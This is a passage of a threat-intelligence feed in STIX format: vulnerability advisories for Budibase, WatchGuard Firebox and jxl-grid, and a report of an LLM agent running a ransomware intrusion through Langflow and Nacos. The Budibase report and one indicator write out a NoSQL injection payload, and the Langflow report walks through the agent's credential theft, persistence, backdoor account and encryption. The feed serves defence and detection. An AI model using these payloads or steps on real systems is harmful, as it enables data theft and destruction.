Exploitation - Access to Steeltoe /actuator/env` Sigma rule to your SIEM and tune for legitimate access patterns.\n",
      "published": "2026-07-03T11:22:21Z",
      "labels": [
        "credential-access",
        "vulnerability",
        ".net",
        "steeltoe",
        "webserver",
        "actuator"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-q62h-354g-5r85"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d291be81-5201-524f-ae67-40f26ce1934a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://sploitus.com/exploit?id=E7208285-7740-58AA-9601-BD03EDB2275F",
      "pattern": "[url:value = 'https://sploitus.com/exploit?id=E7208285-7740-58AA-9601-BD03EDB2275F']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T11:21:33Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--42e8c209-95f5-5488-866e-d2829c4c6703",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--516c88dc-f28b-5baf-9ede-66d4d27d5d2d",
      "target_ref": "indicator--d291be81-5201-524f-ae67-40f26ce1934a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--db3e7b8e-97f3-5912-b47b-f54b20df97c9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/Budibase/budibase/security/advisories/GHSA-8qv3-p479-cj62",
      "pattern": "[url:value = 'https://github.com/Budibase/budibase/security/advisories/GHSA-8qv3-p479-cj62']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T11:21:33Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--260f5f4d-6992-5859-a8ee-f6bde67dc927",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--516c88dc-f28b-5baf-9ede-66d4d27d5d2d",
      "target_ref": "indicator--db3e7b8e-97f3-5912-b47b-f54b20df97c9"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--13dac9c6-4784-5ca6-9eed-5df70f127204",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "other: zzz\",\"name\":{\"$exists\":true},\"$comment\":\"cve-2026-54350",
      "pattern": "[x-ti-bot:other = 'zzz\",\"name\":{\"$exists\":true},\"$comment\":\"cve-2026-54350']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T11:21:33Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2242e88a-d6a2-5dfc-8cd1-c67ddc864568",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--516c88dc-f28b-5baf-9ede-66d4d27d5d2d",
      "target_ref": "indicator--13dac9c6-4784-5ca6-9eed-5df70f127204"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8d83b8a6-22df-5f11-8fc2-2b22f8ee8afc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--516c88dc-f28b-5baf-9ede-66d4d27d5d2d",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Stolen Data",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1565",
          "url": "https://attack.mitre.org/techniques/T1565"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e9d8de81-2cd9-5ccd-b523-021d463cd54b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--516c88dc-f28b-5baf-9ede-66d4d27d5d2d",
      "target_ref": "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data Destruction",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1485",
          "url": "https://attack.mitre.org/techniques/T1485"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ee26412c-cbc0-5a92-ab03-941198ccdbbd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--516c88dc-f28b-5baf-9ede-66d4d27d5d2d",
      "target_ref": "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--516c88dc-f28b-5baf-9ede-66d4d27d5d2d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Budibase NoSQL Operator Injection (CVE-2026-54350)",
      "description": "## Overview\n\nA critical NoSQL operator injection vulnerability, tracked as CVE-2026-54350, affects Budibase server versions up to 3.39.0 (and npm package `@budibase/server` versions `\u003c 3.39.12`). This flaw stems from improper input validation and handling within the `enrichContext` and `validateQueryInputs` functions when processing query templates for MongoDB, CouchDB, Elasticsearch, DynamoDB-PartiQL, or REST-with-JSON-body datasources. An unauthenticated attacker can craft a malicious JSON payload in a parameter value that contains specific JSON metacharacters. When this payload is substituted into a raw JSON query body and subsequently parsed, it can overwrite the intended query logic, such as a `{name: \"...\"}` filter being replaced by `{name: {$exists: true}}`. This allows the attacker to read and modify entire database collections, including sensitive data, using a single HTTP request to a publicly accessible API endpoint, without requiring authentication or bypassing CSRF protections.\n\n## Attack Chain\n\n1.  An attacker identifies a published Budibase application that uses a non-SQL datasource (MongoDB, CouchDB, Elasticsearch, DynamoDB-PartiQL, or REST-with-JSON-body) and has a `PUBLIC` role assigned to at least one query (e.g., `GetUserByName`).\n2.  The attacker, unauthenticated, sends an HTTP `POST` request to `/api/v2/queries/:queryId` for the identified public read query, including an `x-budibase-app-id` header.\n3.  The request body contains a JSON payload with the `parameters` field where a parameter (e.g., `name`) is injected with a crafted string like `x\",\\\"name\\\":{\\\"$exists\\\":true},\\\"$comment\\\":\\\"audit\"`.\n4.  Budibase's `enrichContext` function substitutes this raw parameter value directly into the query's JSON body string without proper JSON-string escaping.\n5.  The subsequent `JSON.parse` operation on the malformed string results in a parsed filter object (e.g., `collection.find()`) where the attacker's injected `$exists:true` clause overrides the legitimate filter, effectively widening the scope to return all documents.\n6.  The Budibase server returns all documents from the collection, including sensitive fields not intended for public exposure (e.g., `password_hash`, `secret`), to the unauthenticated attacker.\n7.  If a `PUBLIC` write query (e.g., `updateMany`) is available, the attacker can similarly inject a payload to widen the `filter` scope, causing the `updateMany` operation to affect all documents in the collection, leading to widespread data modification or destruction.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-54350 allows an unauthenticated visitor to conduct broad data breaches and integrity compromises. This includes the anonymous reading of every document within any MongoDB, CouchDB, Elasticsearch, DynamoDB-PartiQL, or REST-with-JSON-body collection exposed via a `PUBLIC` query. Attackers can exfiltrate sensitive data such as `password_hash`, `secret`, `api_token`, and `mfa_secret` from columns not intended to be returned. Furthermore, where a `PUBLIC` `update`, `delete`, or `aggregate` query exists, attackers can anonymously modify or destroy every document in that collection, extending beyond the original builder's intended single-document scope. All of this can be achieved with a single HTTP request, bypassing session and CSRF protections.\n\n## Recommendation\n\n*   **Patch CVE-2026-54350 immediately:** Upgrade your Budibase server instances to version 3.39.12 or newer to remediate the vulnerability. Refer to the official Budibase release notes and patching guidance.\n*   **Deploy the provided Sigma rule:** Implement the `Detect CVE-2026-54350 Exploitation` Sigma rule in your SIEM to identify attempts at NoSQL operator injection against your Budibase applications.\n*   **Monitor webserver logs:** Specifically look for `POST` requests to `/api/v2/queries/:queryId` containing JSON body parameters with suspicious injection patterns (e.g., `\",\\\\\\\"$exists\\\\\\\":true\"`) in `cs-uri-query` or equivalent fields.\n*   **Audit public queries:** Review all `PUBLIC` role-assigned queries in your Budibase applications, especially those interacting with MongoDB, CouchDB, Elasticsearch, DynamoDB-PartiQL, or REST-with-JSON-body datasources, to ensure sensitive data is not inadvertently exposed or modifiable.\n",
      "published": "2026-07-03T11:21:33Z",
      "labels": [
        "nosql-injection",
        "web-vulnerability",
        "budibase",
        "data-exfiltration",
        "data-manipulation",
        "critical-vulnerability",
        "api-exploitation"
      ],
      "object_refs": [
        "indicator--d291be81-5201-524f-ae67-40f26ce1934a",
        "indicator--db3e7b8e-97f3-5912-b47b-f54b20df97c9",
        "indicator--13dac9c6-4784-5ca6-9eed-5df70f127204",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12",
        "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-8qv3-p479-cj62"
        },
        {
          "source_name": "reference",
          "url": "https://sploitus.com/exploit?id=E7208285-7740-58AA-9601-BD03EDB2275F\u0026utm_source=rss\u0026utm_medium=rss"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e3bac262-72d4-5438-91a8-774363232a1f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2b059a54-4d92-57ec-be3b-3669b748755c",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--48d4e6fa-26de-5ea6-9add-34fd021aab4b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2b059a54-4d92-57ec-be3b-3669b748755c",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--2b059a54-4d92-57ec-be3b-3669b748755c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "WatchGuard Firebox: Multiple Critical Vulnerabilities",
      "description": "## Overview\n\nA critical security advisory from the German Federal Office for Information Security (BSI) highlights multiple severe vulnerabilities in WatchGuard Firebox appliances. These vulnerabilities enable a remote, unauthenticated attacker to achieve arbitrary code execution, cause a denial of service, manipulate or disclose sensitive data, and conduct Cross-Site Scripting (XSS) attacks. While specific CVEs are not detailed in this advisory, the described attack vectors pose significant risks to organizations utilizing these network security devices. The advisory, published on July 3, 2026, underscores the necessity for immediate patching to prevent potential breaches and ensure the integrity and availability of network services for WatchGuard Firebox users.\n\n## Impact\n\nThe successful exploitation of these vulnerabilities could lead to severe consequences for affected organizations. Arbitrary code execution would grant attackers full control over the WatchGuard Firebox appliance, potentially allowing them to pivot into the internal network, exfiltrate confidential data, or establish persistent backdoors. A denial of service attack could disrupt critical network operations, leading to significant downtime and financial losses. Data manipulation and disclosure risks compromise data integrity and confidentiality, while Cross-Site Scripting could be leveraged for further attacks on users or administrators interacting with the device's web interface. These threats impact the core security posture of any organization relying on WatchGuard Firebox for network protection.\n\n## Recommendation\n\n*   Immediately apply all available security updates and patches from WatchGuard for affected Firebox appliances to remediate the vulnerabilities.\n*   Monitor network traffic to and from WatchGuard Firebox devices for anomalous patterns, unusual connections, or signs of unauthorized access attempts.\n*   Review logs from WatchGuard Firebox appliances for any indications of successful exploitation, such as unexpected reboots, configuration changes, or unauthorized command execution.\n",
      "published": "2026-07-03T11:20:08Z",
      "labels": [
        "network",
        "vulnerability",
        "execution",
        "impact"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2193"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c1e65ad3-8fb2-530d-bc25-5e92c5a4ddae",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8e9cad7b-dd7a-5fba-a9bb-3e3c1be414cb",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b0e8bf65-c5de-5a71-8742-042551f9f50e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8e9cad7b-dd7a-5fba-a9bb-3e3c1be414cb",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d28c1c5d-71cc-5e05-8ee3-851176230aa0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8e9cad7b-dd7a-5fba-a9bb-3e3c1be414cb",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9bfe3a61-b50d-5bef-9bb5-b63909906c09",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8e9cad7b-dd7a-5fba-a9bb-3e3c1be414cb",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Scheduled Task/Job",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1053",
          "url": "https://attack.mitre.org/techniques/T1053"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6a7f474c-3422-5948-b5fe-9f21d4a21948",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8e9cad7b-dd7a-5fba-a9bb-3e3c1be414cb",
      "target_ref": "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--45398e9d-452a-5353-8f1e-9c26db560148",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8e9cad7b-dd7a-5fba-a9bb-3e3c1be414cb",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3b66fc64-024b-511c-914d-2be331aa7624",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8e9cad7b-dd7a-5fba-a9bb-3e3c1be414cb",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4c3e7380-a536-599a-8a1e-e402b95df8d6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data Encrypted for Impact",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1486",
          "url": "https://attack.mitre.org/techniques/T1486"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8e546d45-f51f-54c3-834d-221e3b0c63a2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8e9cad7b-dd7a-5fba-a9bb-3e3c1be414cb",
      "target_ref": "attack-pattern--4c3e7380-a536-599a-8a1e-e402b95df8d6"
    },
    {
      "type": "threat-actor",
      "spec_version": "2.1",
      "id": "threat-actor--23876352-98b8-56cd-8677-e6d5d60c3afa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "JadePuffer"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e8649b88-202a-5efd-b4d9-ffe0fd0550fa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "attributed-to",
      "source_ref": "report--8e9cad7b-dd7a-5fba-a9bb-3e3c1be414cb",
      "target_ref": "threat-actor--23876352-98b8-56cd-8677-e6d5d60c3afa"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--8e9cad7b-dd7a-5fba-a9bb-3e3c1be414cb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Agentic AI Used to Conduct Ransomware Attack via Langflow",
      "description": "## Overview\n\nThe threat actor known as JadePuffer has been observed utilizing agentic AI to execute a sophisticated ransomware attack, starting with the exploitation of internet-exposed Langflow instances. This campaign, reported by cloud security firm Sysdig, highlights a critical development in cyber warfare where LLM agents automate complex, multi-stage intrusions by combining known exploitation techniques with real-time reasoning. The initial access vector was CVE-2025-3248 (CVSS 9.8), a critical missing authentication vulnerability in Langflow that was disclosed in April 2026 and flagged by CISA as actively exploited in early May 2026. After gaining arbitrary Python code execution, the LLM-driven attacker systematically conducted reconnaissance, harvested credentials, achieved persistence, and moved laterally to production environments, demonstrating an adaptive attack methodology with minimal direct human intervention.\n\n## Attack Chain\n\n1.  **Initial Access via Langflow Exploitation**: JadePuffer exploits CVE-2025-3248, a critical missing authentication vulnerability in an internet-exposed Langflow instance, to gain arbitrary Python code execution on the host.\n2.  **LLM-driven Reconnaissance**: The compromised Langflow instance, controlled by an LLM agent, performs reconnaissance, sweeping the system for sensitive data such as API keys, cloud credentials, cryptocurrency wallets, configuration files, and database credentials.\n3.  **Credential Harvesting and Persistence**: The LLM dumps Langflow's PostgreSQL database to extract additional secrets and establishes persistence on the Langflow server by deploying a cron job. It also scans reachable internal network services for further credential extraction.\n4.  **Lateral Movement to Production Server**: Utilizing harvested credentials (including root credentials for a MySQL port), the LLM pivots to a production server hosting a MySQL database and an Alibaba Naming and Configuration Service (Nacos) configuration platform.\n5.  **Nacos Exploitation and Backdoor**: The LLM targets the Nacos service, exploiting authentication bypass vulnerabilities (e.g., CVE-2021-29441), forging valid JWT tokens using Nacos's known default signing key, and directly injecting a backdoor administrator into the Nacos backing database via root access.\n6.  **Ransomware Deployment and Data Encryption**: The LLM, after verifying successful access and UDF capabilities, encrypts 1,342 Nacos service configuration items and creates an extortion table containing a ransom demand, payment address, and contact email.\n7.  **Key Destruction**: The randomly generated encryption key is never persisted or transmitted, effectively preventing data recovery for the encrypted Nacos configurations.\n\n## Impact\n\nThis attack resulted in the encryption of 1,342 critical Alibaba Nacos service configuration items, leading to significant data loss and operational disruption for the victim organization. The threat actor also created an extortion table demanding ransom, with no possibility of data recovery due to the destruction of the encryption key. Beyond the direct damage, this incident demonstrates a worrying trend where agentic AI significantly lowers the barrier for complex malicious operations, allowing attackers to automate multi-stage intrusions with minimal cost and adaptive capabilities, posing an increased threat to exposed application servers and unhardened configuration stores across all sectors.\n\n## Recommendation\n\n*   Patch CVE-2025-3248 on all internet-facing Langflow instances immediately to prevent initial access.\n*   Patch CVE-2021-29441 and all other known authentication bypass vulnerabilities in Alibaba Nacos deployments.\n*   Deploy the provided Sigma rule for suspicious cron job creation (`Detect Suspicious Cron Job Creation from Web Application Process`) to your SIEM.\n*   Implement strong authentication for Nacos instances and ensure default JWT signing keys are changed.\n*   Enable comprehensive logging for `process_creation` on Linux servers to detect unusual parent-child process relationships, especially from web application processes.\n*   Deploy the provided Sigma rule for unusual database dump processes (`Detect Database Dump from Non-DBA Web Application Process`) to your SIEM.\n",
      "published": "2026-07-03T11:19:16Z",
      "labels": [
        "ransomware",
        "ai",
        "agentic-ai",
        "vulnerability-exploitation",
        "data-encryption",
        "lateral-movement",
        "persistence"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
        "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011",
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
        "attack-pattern--4c3e7380-a536-599a-8a1e-e402b95df8d6",
        "threat-actor--23876352-98b8-56cd-8677-e6d5d60c3afa"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.securityweek.com/agentic-ai-used-to-conduct-ransomware-attack-via-langflow/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Client Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1203",
          "url": "https://attack.mitre.org/techniques/T1203"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e1273783-3388-5549-9f95-b4912ec26732",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--87ef7466-da38-5d75-8a12-9646bde813cd",
      "target_ref": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--87ef7466-da38-5d75-8a12-9646bde813cd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "JXL-Grid Integer Overflow Leads to Out-of-Bounds Write (CVE-2026-52834)",
      "description": "## Overview\n\nA significant security vulnerability, identified as CVE-2026-52834, has been discovered in the `jxl-grid` Rust library, specifically impacting applications running on 32-bit platforms. This flaw stems from an integer overflow during length calculations when decoding specially crafted JPEG XL images. Attackers can exploit this by engineering images with dimensions that exceed `usize` limits on 32-bit systems, either by specifying extremely large actual frame dimensions (e.g., 65536 x 65536) or by combining a huge canvas with a small cropped frame. The resulting integer overflow causes the library to allocate insufficient memory, leading to out-of-bounds writes during image processing. Successful exploitation of this vulnerability could allow an attacker to achieve arbitrary code execution within the context of the vulnerable application, posing a severe risk to data integrity and system control. The vulnerability affects `jxl-grid` versions up to and including 0.6.1.\n\n## Attack Chain\n\n1.  An attacker crafts a malicious JPEG XL image file designed to trigger an integer overflow on 32-bit systems when processed by the `jxl-grid` library.\n2.  The crafted image contains specific dimensions (e.g., `65536 x 65536` pixels) or canvas/region parameters that cause the product of width and height to exceed the maximum value representable by `usize` on a 32-bit platform.\n3.  A victim's application, compiled for and running on a 32-bit operating system, attempts to process or decode the attacker-controlled JPEG XL image using the vulnerable `jxl-grid` library (version \u003c= 0.6.1).\n4.  During internal memory allocation calculations, specifically within functions like `AlignedGrid::with_alloc_tracker` or related rendering paths in `crates/jxl-render/src/blend.rs`, the integer overflow occurs due to the maliciously large dimension values.\n5.  This integer overflow causes the `jxl-grid` library to allocate a significantly smaller memory buffer than required for the actual image data, creating a heap buffer underflow condition.\n6.  Subsequent operations by the `jxl-grid` library, such as attempting to write decoded pixel data into `subgrids` (e.g., via `as_subgrid_mut().get_mut()`), access memory locations beyond the boundaries of the undersized buffer.\n7.  These out-of-bounds writes allow the attacker to corrupt adjacent memory regions with attacker-controlled data that is embedded within the crafted image.\n8.  Through carefully manipulated memory corruption, the attacker achieves arbitrary code execution within the context of the vulnerable application that was processing the malicious JPEG XL image.\n\n## Impact\n\nOn 32-bit platforms, this vulnerability can cause applications using the `jxl-grid` library to crash or become compromised due to out-of-bounds writes during the decoding of specially crafted JPEG XL images. The most severe impact is the potential for arbitrary code execution, allowing attackers to run malicious code within the context of the affected application. This could lead to data theft, system control, or further network compromise. While no specific victim counts or targeted sectors are provided, any organization or individual processing untrusted JPEG XL images on 32-bit systems using the affected library is at risk.\n\n## Recommendation\n\n*   Patch CVE-2026-52834 immediately by updating the `jxl-grid` library to a version greater than 0.6.1.\n",
      "published": "2026-07-03T11:13:07Z",
      "labels": [
        "jpeg-xl",
        "integer-overflow",
        "rce",
        "library",
        "32-bit",
        "memory-corruption"
      ],
      "object_refs": [
        "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-5pmv-rx8r-wmv5"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6a35e1ec-5186-559a-928d-24cc2bfb431e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
